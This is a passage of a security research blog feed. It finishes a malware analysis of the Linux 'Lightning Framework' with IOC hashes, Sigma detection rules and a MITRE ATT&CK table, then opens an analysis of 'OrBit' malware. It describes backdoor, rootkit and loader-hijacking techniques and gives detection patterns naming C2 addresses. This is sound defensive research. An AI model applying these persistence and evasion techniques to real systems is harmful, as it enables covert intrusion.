&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig10.png" title="The dynamic XOR decoding routine" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;The dynamic XOR decoding routine&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The decoded configuration is structured in JSON. The default configuration in
the analyzed sample uses a local IP address &lt;code&gt;10.2.22[.]67&lt;/code&gt; with the port
&lt;code&gt;33229&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig11.png" title="Decoded default configuration" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Decoded default configuration&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;There is a passive mode of communication available if the actor executes the
&lt;code&gt;RunShellPure&lt;/code&gt; command. This starts an SSH service on the infected machine with
the &lt;code&gt;Linux.Plugin.Lightning.Sshd&lt;/code&gt; plugin. The plugin is an OpenSSH daemon that
has hardcoded private and host keys, allowing the attacker to SSH into the
machine with their own SSH key, creating a secondary backdoor.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/lightning-framework-new-linux-threat/images/fig12.png" title="Hardcoded keys inside the modified OpenSSH daemon" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Hardcoded keys inside the modified OpenSSH daemon&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Summary&lt;span class="hx:absolute hx:-mt-20" id="summary"&gt;&lt;/span&gt;
&lt;a href="#summary" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The Lightning Framework is an interesting malware as it is not common to see
such a large framework developed for targeting Linux. Although we do not have
all the files, we can infer some of the missing functionality based on strings
and code of the modules that we do possess. Check out our next blog here about
&lt;a href="../../../2022/08/lightning-framework-linux-detection-rules-osquery"&gt;detection opportunities for Lightning Framework using osquery&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;We would like to extend a huge thanks to our friends and partners at IBM and
SentinelOne for their help during investigating this threat.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;IOCs for Lightning Framework&lt;span class="hx:absolute hx:-mt-20" id="iocs-for-lightning-framework"&gt;&lt;/span&gt;
&lt;a href="#iocs-for-lightning-framework" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Hashes&lt;span class="hx:absolute hx:-mt-20" id="hashes"&gt;&lt;/span&gt;
&lt;a href="#hashes" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;File&lt;/th&gt;
&lt;th&gt;SHA256&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Lightning.Downloader&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://analyze.intezer.com/files/48f9471c20316b295704e6f8feb2196dd619799edec5835734fc24051f45c5b7"target="_blank" rel="noopener"&gt;&lt;code&gt;48f9471c20316b295704e6f8feb2196dd619799edec5835734fc24051f45c5b7&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Lightning.Core&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://analyze.intezer.com/files/fd285c2fb4d42dde23590118dba016bf5b846625da3abdbe48773530a07bcd1e"target="_blank" rel="noopener"&gt;&lt;code&gt;fd285c2fb4d42dde23590118dba016bf5b846625da3abdbe48773530a07bcd1e&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Linux.Plugin.Lightning.Sshd&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://analyze.intezer.com/files/ad16989a3ebf0b416681f8db31af098e02eabd25452f8d781383547ead395237"target="_blank" rel="noopener"&gt;&lt;code&gt;ad16989a3ebf0b416681f8db31af098e02eabd25452f8d781383547ead395237&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Sigma Detection Rules&lt;span class="hx:absolute hx:-mt-20" id="sigma-detection-rules"&gt;&lt;/span&gt;
&lt;a href="#sigma-detection-rules" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Lightning Framework File Path&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;status&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;experimental&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;description&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Detects creation of files related to Lightning Framework.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;author&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Intezer&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;references&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="l"&gt;https://intezer.com&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;logsource&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;linux&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;file_create&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;selection1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;TargetFilename|startswith&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;/usr/lib64/seahorses/&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;selection2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;TargetFilename|contains&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;kbioset&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;cpc&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;kkdmflush&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;soss&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;sshod&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;nethoogs&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;iftoop&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;iptraof&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;selection1 and selection2&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;falsepositives&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="l"&gt;Unknown.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Lightning Default C2 Communication&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;status&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;experimental&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;description&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Detects communication to default local ip for Lightning Framework&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;author&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Intezer&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;references&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="l"&gt;https://intezer.com&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;logsource&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;firewall&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;select_outgoing&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;dst_ip&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="m"&gt;10.2.22.67&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;dst_port&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="m"&gt;33229&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;select_outgoing&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;falsepositives&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="l"&gt;Unknown.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;MITRE ATT&amp;amp;CK&lt;span class="hx:absolute hx:-mt-20" id="mitre-attck"&gt;&lt;/span&gt;
&lt;a href="#mitre-attck" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;ID&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Persistence&lt;/td&gt;
&lt;td&gt;Boot or Logon Initialization Scripts&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1037/"target="_blank" rel="noopener"&gt;T1037&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;An init.d script is used for persistence of downloader module&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence&lt;/td&gt;
&lt;td&gt;SSH Authorized Keys&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1098/004/"target="_blank" rel="noopener"&gt;T1098.004&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;SSH keys can be added to the authorized_keys file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Obfuscated Files or Information&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1027/"target="_blank" rel="noopener"&gt;T1027&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The C2 profile is encoded on disk&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Deobfuscate/Decode Files or Information&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1140/"target="_blank" rel="noopener"&gt;T1140&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The C2 profile is decoded with a dynamic XOR algorithm&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Hide Artifacts&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1564/"target="_blank" rel="noopener"&gt;T1564&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Many artifacts are hidden including ports, PIDs, and file timestamps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Masquerading&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1036/"target="_blank" rel="noopener"&gt;T1036&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Many files are masqueraded as other files or tasks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Rootkit&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1014/"target="_blank" rel="noopener"&gt;T1014&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;LKM and LD_PRELOAD rootkits are used&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Timestomp&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1070/006/"target="_blank" rel="noopener"&gt;T1070.006&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Files created by Lightning are modified to match that of other utilities&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;File Deletion&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1070/004/"target="_blank" rel="noopener"&gt;T1070.004&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The framework has the ability to remove itself&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;File and Directory Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1083/"target="_blank" rel="noopener"&gt;T1083&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The framework can list files and directories on infected systems&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;Network Service Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1046/"target="_blank" rel="noopener"&gt;T1046&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Multiple plugins can be used to perform network service discovery&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;Network Sniffing&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1040/"target="_blank" rel="noopener"&gt;T1040&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Multiple plugins can be used to perform network sniffing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;System Information Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1082/"target="_blank" rel="noopener"&gt;T1082&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Lightning can perform detailed system fingerprinting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;Data Encoding&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1132/"target="_blank" rel="noopener"&gt;T1132&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Data from the C2 is encoded&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;Non-Application Layer Protocol&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1095/"target="_blank" rel="noopener"&gt;T1095&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Communication with the C2 is performed over TCP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;Proxy&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1090/"target="_blank" rel="noopener"&gt;T1090&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The framework has the ability to start a Socks5 proxy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;Exfiltration Over C2 Channel&lt;/td&gt;
&lt;td&gt;&lt;a href="https://attack.mitre.org/techniques/T1041/"target="_blank" rel="noopener"&gt;T1041&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Data can be exfiltrated&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;</description></item><item><title>OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow</title><link>https://research.intezer.com/blog/2022/07/orbit-new-undetected-linux-threat/</link><pubDate>Wed, 06 Jul 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/07/orbit-new-undetected-linux-threat/</guid><description>
&lt;p&gt;Linux is a popular operating system for servers and cloud infrastructures, and
as such it&amp;rsquo;s not a surprise that it attracts threat actors&amp;rsquo; interest and we see
a &lt;a href="https://www.ibm.com/downloads/cas/ADLMYLAZ"target="_blank" rel="noopener"&gt;continued growth&lt;/a&gt; and innovation
of malware that targets Linux, such as the recent
&lt;a href="../../../2022/06/new-linux-threat-symbiote"&gt;Symbiote&lt;/a&gt; malware that was
discovered by our research team.&lt;/p&gt;
&lt;p&gt;In this blog we will provide a deep technical analysis of a new and fully
undetected Linux threat we named OrBit, because this is one of the filenames
that is being used by the malware to temporarily store the output of executed
commands. It can be installed either with persistence capabilities or as a
volatile implant. The malware implements advanced evasion techniques and gains
persistence on the machine by hooking key functions, provides the threat actors
with remote access capabilities over SSH, harvests credentials, and logs TTY
commands. Once the malware is installed it will infect all of the running
processes, including new processes, that are running on the machine.&lt;/p&gt;
&lt;p&gt;Unlike other threats that hijack shared libraries by modifying the environment
variable &lt;code&gt;LD_PRELOAD&lt;/code&gt;, this malware uses 2 different ways to load the malicious
library. The first way is by adding the shared object to the configuration file
that is used by the loader. The second way is by patching the binary of the
loader itself so it will load the malicious shared object.&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;The OrBit Dropper&lt;span class="hx:absolute hx:-mt-20" id="the-orbit-dropper"&gt;&lt;/span&gt;
&lt;a href="#the-orbit-dropper" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/07/orbit-new-undetected-linux-threat/images/fig1.png" title="The dropper sample on VT 67048a69a007c37f8be5d01a95f6a026" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;The dropper sample on VT 67048a69a007c37f8be5d01a95f6a026&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
